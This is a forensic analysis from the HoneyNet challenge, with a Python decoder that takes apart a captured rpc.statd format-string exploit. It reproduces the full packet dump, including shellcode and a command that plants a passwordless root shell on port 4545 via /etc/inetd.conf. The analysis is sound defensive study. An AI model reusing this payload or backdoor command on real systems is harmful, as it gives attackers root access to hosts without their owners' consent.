The HoneyNet Forensic Challenge -- Analysis & Findings
The Exploit
11/07-23:11:50.870124 216.216.74.2:710 -> 172.16.1.107:871
UDP TTL:42 TOS:0x0 ID:16143
Len: 456
3E D1 BA B6 00 00 00 00 00 00 00 02 00 01 86 B8 >...............
00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 01 67 04 F7 FF BF ...........g....
04 F7 FF BF 05 F7 FF BF 05 F7 FF BF 06 F7 FF BF ................
06 F7 FF BF 07 F7 FF BF 07 F7 FF BF 25 30 38 78 ............%08x
20 25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 %08x %08x %08x
25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 %08x %08x %08x %
30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 08x %08x %08x %0
38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 38 8x %08x %08x %08
78 20 25 30 32 34 32 78 25 6E 25 30 35 35 78 25 x %0242x%n%055x%
6E 25 30 31 32 78 25 6E 25 30 31 39 32 78 25 6E n%012x%n%0192x%n
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 EB 4B 5E 89 76 AC 83 EE 20 8D 5E 28 83 C6 ...K^.v... .^(..
20 89 5E B0 83 EE 20 8D 5E 2E 83 C6 20 83 C3 20 .^... .^... ..
83 EB 23 89 5E B4 31 C0 83 EE 20 88 46 27 88 46 ..#.^.1... .F'.F
2A 83 C6 20 88 46 AB 89 46 B8 B0 2B 2C 20 89 F3 *.. .F..F..+, ..
8D 4E AC 8D 56 B8 CD 80 31 DB 89 D8 40 CD 80 E8 .N..V...1...@...
B0 FF FF FF 2F 62 69 6E 2F 73 68 20 2D 63 20 65 ..../bin/sh -c e
63 68 6F 20 34 35 34 35 20 73 74 72 65 61 6D 20 cho 4545 stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 20 3E 3E /bin/sh sh -i >>
20 2F 65 74 63 2F 69 6E 65 74 64 2E 63 6F 6E 66 /etc/inetd.conf
3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 6E ;killall -HUP in
65 74 64 00 00 00 00 09 6C 6F 63 61 6C 68 6F 73 etd.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Notes:
Snort IDS log -- the UDP packet carrying the exploit payload. The dump holds 448 bytes of payload; Snort's "Len: 456" is the UDP length field, which includes the 8-byte UDP header.
The interesting parts are in the middle and at the end. The first 40 bytes are an ONC RPC call header: XID 0x3ED1BAB6, message type 0 (CALL), RPC version 2, program 0x186B8 = 100024 (the "status" service, rpc.statd), version 1, procedure 2, AUTH_NULL credentials and verifier. The procedure argument that follows is a 0x167 = 359-byte XDR string, and that string is the exploit. It starts with eight little-endian pointers, 0xbffff704 to 0xbffff707 with each address repeated twice: the locations the %n directives will write through. Next come fourteen %08x directives, each of which consumes one stack word, to walk up the stack to where those pointers sit, then four padded conversions each followed by %n (%0242x%n %055x%n %012x%n %0192x%n). Every %n stores the running count of characters output so far through the next pointer; because the pointers are one byte apart, the low byte of each store lands in successive bytes of one 32-bit word, and the widths 242, 55, 12 and 192 set how much the count grows between stores. The value finally left in that word cannot be read off the packet alone, since the count also includes whatever the vulnerable process printed ahead of the attacker's string.
Then a 50-byte NOP sled (0x90), followed by 82 bytes of x86 Linux shellcode: a jmp/call/pop sequence (EB 4B ... E8 B0 FF FF FF) to locate the command string, byte stores that patch NUL terminators into it, execve via int 0x80 (CD 80), and exit.
The command string is: /bin/sh -c echo 4545 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
The payload appends an inetd entry that runs an interactive /bin/sh as root for every TCP connection to port 4545, then sends inetd SIGHUP so it rereads /etc/inetd.conf and starts listening on that port. No password is involved: anyone who can reach 4545 gets a root shell, and the added line stays in /etc/inetd.conf on the compromised host, which is exactly what to look for there.
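As an added example (not part of the Honeynet analysis), the script below reassembles the Snort dump above into bytes and takes it apart field by field: the ONC RPC call header (RFC 1831/1832 XDR layout), the oversized string argument, the pointers the %n directives write through, the format directives, the NOP sled, the shellcode and the command string. The dump lines are the ones from this page; everything else is the example's own code. It reports only the %n targets and field widths, because the value each %n actually writes depends on how many characters the vulnerable process formatted ahead of the attacker's string, which the packet alone does not reveal.

```python
"""Reassemble the Snort hex dump above and pull the exploit apart (added example)."""
import re
import struct

# The 28 dump lines from the Snort log above, copied verbatim (hex columns + ASCII column).
SNORT_DUMP = """\
3E D1 BA B6 00 00 00 00 00 00 00 02 00 01 86 B8 >...............
00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 01 67 04 F7 FF BF ...........g....
04 F7 FF BF 05 F7 FF BF 05 F7 FF BF 06 F7 FF BF ................
06 F7 FF BF 07 F7 FF BF 07 F7 FF BF 25 30 38 78 ............%08x
20 25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 %08x %08x %08x
25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 %08x %08x %08x %
30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 08x %08x %08x %0
38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 38 8x %08x %08x %08
78 20 25 30 32 34 32 78 25 6E 25 30 35 35 78 25 x %0242x%n%055x%
6E 25 30 31 32 78 25 6E 25 30 31 39 32 78 25 6E n%012x%n%0192x%n
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 EB 4B 5E 89 76 AC 83 EE 20 8D 5E 28 83 C6 ...K^.v... .^(..
20 89 5E B0 83 EE 20 8D 5E 2E 83 C6 20 83 C3 20 .^... .^... ..
83 EB 23 89 5E B4 31 C0 83 EE 20 88 46 27 88 46 ..#.^.1... .F'.F
2A 83 C6 20 88 46 AB 89 46 B8 B0 2B 2C 20 89 F3 *.. .F..F..+, ..
8D 4E AC 8D 56 B8 CD 80 31 DB 89 D8 40 CD 80 E8 .N..V...1...@...
B0 FF FF FF 2F 62 69 6E 2F 73 68 20 2D 63 20 65 ..../bin/sh -c e
63 68 6F 20 34 35 34 35 20 73 74 72 65 61 6D 20 cho 4545 stream
74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root
2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 20 3E 3E /bin/sh sh -i >>
20 2F 65 74 63 2F 69 6E 65 74 64 2E 63 6F 6E 66 /etc/inetd.conf
3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 6E ;killall -HUP in
65 74 64 00 00 00 00 09 6C 6F 63 61 6C 68 6F 73 etd.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
"""

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")

def parse_snort_dump(dump):
    """Rebuild payload bytes from Snort's 'XX XX ... ascii' lines: at most 16 hex-pair
    tokens per line, stopping at the first non-hex token so ASCII text such as '%08x'
    is never swallowed (a short last line whose ASCII column starts with two hex
    characters would still fool this; none occurs here)."""
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[:16]:
            if not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)

def xdr_u32(buf, off):  # big-endian XDR unsigned int -> (value, next offset)
    return struct.unpack_from(">I", buf, off)[0], off + 4

def xdr_opaque(buf, off):  # XDR string/opaque: 4-byte length, data, pad to 4 bytes
    n, off = xdr_u32(buf, off)
    return buf[off:off + n], off + ((n + 3) & ~3)

def decode_rpc_call(payload):
    """ONC RPC v2 call header (RFC 1831) -> (fields, offset of the procedure args)."""
    xid, msg_type, rpcvers, prog, vers, proc = struct.unpack_from(">6I", payload, 0)
    cred_flavor, off = xdr_u32(payload, 24)
    _cred, off = xdr_opaque(payload, off)
    verf_flavor, off = xdr_u32(payload, off)
    _verf, off = xdr_opaque(payload, off)
    return dict(xid=xid, msg_type=msg_type, rpcvers=rpcvers, prog=prog, vers=vers,
                proc=proc, cred_flavor=cred_flavor, verf_flavor=verf_flavor), off

def analyze_exploit(payload):
    """Split the oversized hostname argument into the pieces the exploit is built from."""
    hdr, off = decode_rpc_call(payload)
    if hdr["msg_type"] != 0 or hdr["rpcvers"] != 2:
        raise ValueError("not an RPC v2 CALL")
    hostname, off = xdr_opaque(payload, off)  # first argument: the format string
    second, off = xdr_opaque(payload, off)    # next XDR string ("localhost" here)
    # 1. Little-endian pointers up to the first '%': the addresses %n writes through.
    n_ptrs = 0
    while hostname[4 * n_ptrs] != ord("%"):
        n_ptrs += 1
    ptrs = struct.unpack_from("<%dI" % n_ptrs, hostname, 0)
    fmt_start = 4 * n_ptrs
    # 2. Format directives run up to the first NOP (0x90) of the sled.
    fmt_end = hostname.index(b"\x90", fmt_start)
    directives = re.findall(rb"%\d*[xn]", hostname[fmt_start:fmt_end])
    # 3. NOP sled, then shellcode, then the command string it execs.
    sled_end = fmt_end
    while hostname[sled_end] == 0x90:
        sled_end += 1
    cmd_start = hostname.index(b"/bin/sh", sled_end)
    return dict(rpc=hdr, write_targets=sorted(set(ptrs)), directives=directives,
                n_writes=directives.count(b"%n"), nop_sled_len=sled_end - fmt_end,
                shellcode=hostname[sled_end:cmd_start],
                command=hostname[cmd_start:].decode("ascii"),
                second_string=second.decode("ascii"))

PAYLOAD = parse_snort_dump(SNORT_DUMP)
REPORT = analyze_exploit(PAYLOAD)

if __name__ == "__main__":
    print(f"{len(PAYLOAD)} bytes, RPC prog {REPORT['rpc']['prog']}, %n targets "
          f"{[hex(a) for a in REPORT['write_targets']]}, command: {REPORT['command']}")
```

The 448-byte total is the first thing to check, since a dump copied with a line missing would silently shift every offset; the same parser works on any Snort hex dump of this format, and the XDR helpers are what a reviewer reaches for to confirm that the oversized string really is the procedure argument rather than part of the credentials.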